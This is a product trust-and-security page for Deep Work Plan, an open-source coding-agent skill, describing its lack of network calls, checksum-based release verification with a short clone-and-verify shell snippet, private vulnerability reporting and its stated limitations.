Skip to content

Trust & security

Trust and security

Nobody should install a skill they cannot trust. Deep Work Plan is built to be verified, not taken on faith: open source, Markdown-first, non-destructive, and checkable before you run it. This page states plainly what it does, what it does not do, and how to confirm both.

What you are trusting

Open source and MIT licensed

The website and the skill are both public and diffable. You can read every line before you run it, and compare any copy against the source at a tagged release.

Markdown-first — no network, no telemetry

The skill has no CLI, no HTTP API, and no authentication flow. It makes no network calls and sends no telemetry; its only local helper reads git and environment metadata. Nothing about your repository leaves your machine.

Non-destructive by design

The only security-relevant thing the skill does is change your repository — and it reconciles rather than clobbers. It detects what exists, proposes a plan, and asks before replacing anything. Plan output lives in a gitignored .dwp/ directory.

Touches no secrets

The methodology never commits secrets and keeps working state out of version control. Onboarding appends to .gitignore rather than rewriting it, and every change is meant to be reviewed in small, readable diffs.

Verifiable provenance

Every release publishes checksums over the shipped skill, so you can confirm a downloaded copy matches what was published before you trust it.

Verify before you run

Treat the skill as untrusted until you have checked it. Each release attaches a SHA256SUMS file covering the shipped skill. Download it for the version you intend to install, then verify your copy matches — a non-zero exit means a file does not match and you should stop.

shell 
git clone https://github.com/DailybotHQ/deepworkplan-skill.git
cd deepworkplan-skill
# Download the checksums for the release you intend to install (replace vX.Y.Z):
curl -fsSL -o SHA256SUMS \
  https://github.com/DailybotHQ/deepworkplan-skill/releases/download/vX.Y.Z/SHA256SUMS
./setup.sh --verify        # non-zero exit means a file does not match — stop

Releases are checksummed, not signed — signing (cosign or maintainer GPG) is a documented next step, not a current claim. Because everything is open, you can also diff any file against the repository at its tag.

Report a vulnerability

Found a security issue? Report it privately through GitHub's private vulnerability reporting on the relevant repository — the skill or the website (see the security policies linked below) — rather than opening a public issue, which would expose the problem before a fix exists.

Report a vulnerability — Skill repository Report a vulnerability — Website repository

Trust resources

Honest limitations

  • Releases are checksummed, not yet cryptographically signed — signing is planned, not done.
  • Deep Work Plan runs an autonomous coding agent against your repository. Review its proposed plan and its diffs; the methodology is designed for that review, not to replace it.
  • Trust claims here describe the official sources only. A modified or third-party copy that has drifted from the repositories carries none of these guarantees — verify it first.

Adopt it with confidence

Read the methodology and the specification, point an agent at the init endpoint, and verify the install before you run it.

Read the methodology Adoption (init)